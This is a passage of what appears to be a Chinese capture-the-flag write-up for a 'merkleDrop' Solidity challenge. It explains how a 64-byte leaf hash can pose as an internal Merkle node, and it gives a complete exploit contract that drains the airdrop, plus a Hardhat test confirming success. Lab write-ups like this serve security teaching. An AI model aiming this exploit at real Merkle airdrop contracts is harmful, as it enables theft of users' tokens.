    <span class="token punctuation">}</span>

    <span class="token comment">// Check if the computed hash (root) is equal to the provided root</span>
    <span class="token keyword keyword-return">return</span> computedHash <span class="token operator">==</span> root<span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</pre><p>&#x5176;&#x5B9E;&#x9A8C;&#x8BC1;&#x8FC7;&#x7A0B;&#x548C;merkletree&#x7684;&#x6807;&#x51C6;&#x5B9E;&#x73B0;&#x4E00;&#x6837;&#xFF0C;&#x5C06;&#x53F6;&#x5B50;&#x8282;&#x70B9;&#x548C;&#x9A8C;&#x8BC1;&#x8282;&#x70B9;&#x81EA;&#x4E0B;&#x800C;&#x4E0A;&#xFF0C;&#x4E24;&#x4E24;&#x54C8;&#x5E0C;&#x62FC;&#x63A5;&#x5728;&#x4E00;&#x8D77;&#x540E;&#x518D;&#x53D6;&#x54C8;&#x5E0C;&#xFF0C;&#x6700;&#x7EC8;&#x548C;root&#x54C8;&#x5E0C;&#x6BD4;&#x8F83;&#x662F;&#x5426;&#x76F8;&#x7B49;&#x3002;</p>
<p>&#x90A3;&#x4E48;&#x7531;&#x4E8E;&#x4E4B;&#x524D;&#x7684;&#x5DE7;&#x5408;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;index&#x4E3A;37&#x8282;&#x70B9;&#x7684;&#x7B2C;&#x4E00;&#x4E2A;proof&#x8282;&#x70B9;&#x4E3A;&#x7A81;&#x7834;&#x53E3;&#x3002;</p>
<blockquote>
<p>&#x7531;&#x4E8E;&#x9A8C;&#x8BC1;&#x8FC7;&#x7A0B;&#x7684;&#x7B2C;&#x4E00;&#x6B21;&#x9A8C;&#x8BC1;&#xFF08;&#x88AB;&#x9A8C;&#x8BC1;&#x8282;&#x70B9;&#x548C;&#x7B2C;&#x4E00;&#x4E2A;proof&#x8282;&#x70B9;hex&#xFF09;&#x4E5F;&#x662F;&#x9700;&#x8981;37&#x53F7;&#x8282;&#x70B9;&#x7684;&#x54C8;&#x5E0C;&#x548C;&#x6211;&#x4EEC;&#x7684;&#x201C;&#x7A81;&#x7834;&#x53E3;&#x201D;&#x54C8;&#x5E0C;&#x62FC;&#x63A5;&#x540E;&#x518D;&#x53D6;&#x54C8;&#x5E0C;&#x8FDB;&#x884C;&#x540E;&#x9762;&#x7684;&#x64CD;&#x4F5C;&#x3002;</p>
<p>&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5728;&#x7B2C;&#x4E00;&#x6B21;&#x9A8C;&#x8BC1;&#x7684;&#x8FD9;&#x4E2A;&#x70B9;&#x505A;&#x6587;&#x7AE0;&#x4E86;</p>
</blockquote>
<p>&#x6211;&#x4EEC;&#x56DE;&#x8FC7;&#x5934;&#x6765;&#x770B;&#x4E00;&#x770B;<code>claim</code>&#x51FD;&#x6570;&#x91CC;&#x9762;&#x662F;&#x600E;&#x4E48;&#x8BA1;&#x7B97;&#x7684;&#x8282;&#x70B9;&#x54C8;&#x5E0C;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>bytes32 node = keccak256(abi.encodePacked(index, account, amount));
</code></pre><p>&#x4E4B;&#x524D;&#x8BB2;&#x5230;&#xFF0C;<code>index</code>&#x53EF;&#x4EE5;&#x770B;&#x4F5C;&#x524D;&#x54C8;&#x5E0C;&#xFF0C;<code>account</code>&#x548C;<code>amount</code>&#x53EF;&#x4EE5;&#x770B;&#x4F5C;&#x540E;&#x54C8;&#x5E0C;&#xFF0C;&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x6784;&#x9020;&#x51FA;&#x7B2C;&#x4E00;&#x6B21;&#x9A8C;&#x8BC1;&#x65F6;&#x7684;&#x62FC;&#x63A5;&#x3002;</p>
<p>&#x4E5F;&#x5C31;&#x662F;&#x8BF4;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5B8C;&#x7F8E;&#x7684;&#x7528;&#x201C;&#x610F;&#x5916;&#x201D;&#x7684;&#x53C2;&#x6570;&#x901A;&#x8FC7;&#x9A8C;&#x8BC1;&#x3002;</p>
<p>&#x4F46;&#x6B64;&#x65F6;<code>account</code>&#x4E3A;<code>0xd48451c19959e2D9bD4E620fBE88aA5F6F7eA72A</code>,amount&#x4E3A;<code>0x00000f40f0c122ae08d2207b</code>&#x8FD9;&#x90FD;&#x662F;&#x610F;&#x5916;&#x7684;&#x53C2;&#x6570;&#x3002;&#x800C;<code>amount</code>&#x6362;&#x7B97;&#x4E4B;&#x540E;&#x521A;&#x597D;&#x5C0F;&#x4E8E;75</p>
<pre data-role="codeBlock" data-info class="language-"><code>&#x8BA1;&#x7B97;&#x4E00;&#x4E0B;&#x8FD8;&#x5269;&#x591A;&#x5C11;token&#x672A;&#x9886;
0x0fe1c215e8f838e00000 - 0x00000f40f0c122ae08d2207b = 
0xa0d154c64a300ddf85
</code></pre><p>&#x800C;&#x8FD9;&#x4E2A;amout&#x521A;&#x597D;&#x4E0E;index&#x4E3A;8&#x7684;&#x8282;&#x70B9;amout&#x76F8;&#x540C;&#xFF0C;&#x90A3;&#x4E48;&#x53EA;&#x8981;&#x901A;&#x8FC7;&#x8FD9;&#x4E2A;&#x53F6;&#x5B50;&#x8282;&#x70B9;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x9886;&#x5B8C;&#x7A7A;&#x6295;&#x5408;&#x7EA6;&#x91CC;&#x7684;&#x6240;&#x6709;token&#xFF0C;&#x89E3;&#x51B3;&#x672C;&#x9898;&#x3002;</p>
<p>&#x9644;exploit&#x5408;&#x7EA6;</p>
<pre data-role="codeBlock" data-info="solidity" class="language-solidity"><span class="token keyword keyword-contract">contract</span> <span class="token class-name">Exploit</span> <span class="token punctuation">{</span>
    <span class="token keyword keyword-constructor">constructor</span><span class="token punctuation">(</span>Setup setup<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        MerkleDistributor merkleDistributor <span class="token operator">=</span> setup<span class="token punctuation">.</span><span class="token function">merkleDistributor</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        
        <span class="token comment">//&#x901A;&#x8FC7;&#x62FC;&#x63A5;&#x54C8;&#x5E0C;&#xFF0C;&#x8DF3;&#x8FC7;&#x7B2C;&#x4E00;&#x4E2A;&#x9A8C;&#x8BC1;&#x8282;&#x70B9;&#x3002;</span>
        <span class="token builtin">bytes32</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token keyword keyword-memory">memory</span> merkleProof1 <span class="token operator">=</span> <span class="token keyword keyword-new">new</span> <span class="token class-name">bytes32</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof1<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0x8920c10a5317ecff2d0de2150d5d18f01cb53a377f4c29a9656785a22a680d1d</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof1<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0xc999b0a9763c737361256ccc81801b6f759e725e115e4a10aa07e63d27033fde</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof1<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0x842f0da95edb7b8dca299f71c33d4e4ecbb37c2301220f6e17eef76c5f386813</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof1<span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0x0e3089bffdef8d325761bd4711d7c59b18553f14d84116aecb9098bba3c0a20c</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof1<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0x5271d2d8f9a3cc8d6fd02bfb11720e1c518a3bb08e7110d6bf7558764a8da1c5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleDistributor<span class="token punctuation">.</span><span class="token function">claim</span><span class="token punctuation">(</span>
                <span class="token number">0xd43194becc149ad7bf6db88a0ae8a6622e369b3367ba2cc97ba1ea28c407c442</span><span class="token punctuation">,</span> 
                <span class="token builtin">address</span><span class="token punctuation">(</span><span class="token number">0x00d48451c19959e2d9bd4e620fbe88aa5f6f7ea72a</span><span class="token punctuation">)</span><span class="token punctuation">,</span> 
                <span class="token number">0x00000f40f0c122ae08d2207b</span><span class="token punctuation">,</span>
                merkleProof1
        <span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token comment">//&#x7528;index 8&#x53D6;&#x5B8C;&#x5269;&#x4E0B;&#x7684;token&#x5373;&#x53EF;</span>
        <span class="token builtin">bytes32</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token keyword keyword-memory">memory</span> merkleProof2 <span class="token operator">=</span> <span class="token keyword keyword-new">new</span> <span class="token class-name">bytes32</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof2<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0xe10102068cab128ad732ed1a8f53922f78f0acdca6aa82a072e02a77d343be00</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof2<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0xd779d1890bba630ee282997e511c09575fae6af79d88ae89a7a850a3eb2876b3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof2<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0x46b46a28fab615ab202ace89e215576e28ed0ee55f5f6b5e36d7ce9b0d1feda2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof2<span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0xabde46c0e277501c050793f072f0759904f6b2b8e94023efb7fc9112f366374a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof2<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0x0e3089bffdef8d325761bd4711d7c59b18553f14d84116aecb9098bba3c0a20c</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleProof2<span class="token punctuation">[</span><span class="token number">5</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token builtin">bytes32</span><span class="token punctuation">(</span><span class="token number">0x5271d2d8f9a3cc8d6fd02bfb11720e1c518a3bb08e7110d6bf7558764a8da1c5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        merkleDistributor<span class="token punctuation">.</span><span class="token function">claim</span><span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token builtin">address</span><span class="token punctuation">(</span><span class="token number">0x249934e4C5b838F920883a9f3ceC255C0aB3f827</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">0xa0d154c64a300ddf85</span><span class="token punctuation">,</span> merkleProof2<span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</pre><p>&#x9644;hardhat&#x6D4B;&#x8BD5;&#x7528;&#x4F8B;</p>
<pre data-role="codeBlock" data-info="javascript" class="language-javascript"><span class="token keyword keyword-const">const</span> <span class="token punctuation">{</span> expect <span class="token punctuation">}</span> <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">&quot;chai&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword keyword-const">const</span> <span class="token punctuation">{</span> ethers <span class="token punctuation">}</span> <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">&apos;hardhat&apos;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">describe</span><span class="token punctuation">(</span><span class="token string">&quot;Challange merkleDrop&quot;</span><span class="token punctuation">,</span> <span class="token keyword keyword-function">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword keyword-let">let</span> attacker<span class="token punctuation">,</span>deployer<span class="token punctuation">;</span>
    <span class="token function">it</span><span class="token punctuation">(</span><span class="token string">&quot;should return the solved&quot;</span><span class="token punctuation">,</span> <span class="token keyword keyword-async">async</span> <span class="token keyword keyword-function">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token punctuation">[</span>attacker<span class="token punctuation">,</span>deployer<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token keyword control-flow keyword-await">await</span> ethers<span class="token punctuation">.</span><span class="token method function property-access">getSigners</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword keyword-const">const</span> <span class="token maybe-class-name">SetupFactory</span> <span class="token operator">=</span> <span class="token keyword control-flow keyword-await">await</span> ethers<span class="token punctuation">.</span><span class="token method function property-access">getContractFactory</span><span class="token punctuation">(</span><span class="token string">&quot;MerkleSetup&quot;</span><span class="token punctuation">,</span> attacker<span class="token punctuation">)</span><span class="token punctuation">;</span>
  
        <span class="token keyword keyword-const">const</span> setup <span class="token operator">=</span> <span class="token keyword control-flow keyword-await">await</span> <span class="token maybe-class-name">SetupFactory</span><span class="token punctuation">.</span><span class="token method function property-access">deploy</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
            value<span class="token operator">:</span> ethers<span class="token punctuation">.</span><span class="token property-access">utils</span><span class="token punctuation">.</span><span class="token method function property-access">parseEther</span><span class="token punctuation">(</span><span class="token string">&quot;75&quot;</span><span class="token punctuation">)</span>
        <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        
        <span class="token comment">//Exploit</span>

        <span class="token keyword keyword-const">const</span> <span class="token maybe-class-name">ExploitFactory</span> <span class="token operator">=</span> <span class="token keyword control-flow keyword-await">await</span> ethers<span class="token punctuation">.</span><span class="token method function property-access">getContractFactory</span><span class="token punctuation">(</span><span class="token string">&quot;MerkleDropExploit&quot;</span><span class="token punctuation">,</span>attacker<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword control-flow keyword-await">await</span> <span class="token maybe-class-name">ExploitFactory</span><span class="token punctuation">.</span><span class="token method function property-access">deploy</span><span class="token punctuation">(</span>setup<span class="token punctuation">.</span><span class="token property-access">address</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


        <span class="token function">expect</span><span class="token punctuation">(</span><span class="token keyword control-flow keyword-await">await</span> setup<span class="token punctuation">.</span><span class="token method function property-access">isSolved</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token property-access">to</span><span class="token punctuation">.</span><span class="token method function property-access">equal</span><span class="token punctuation">(</span><span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        
    <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  
</pre>
      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>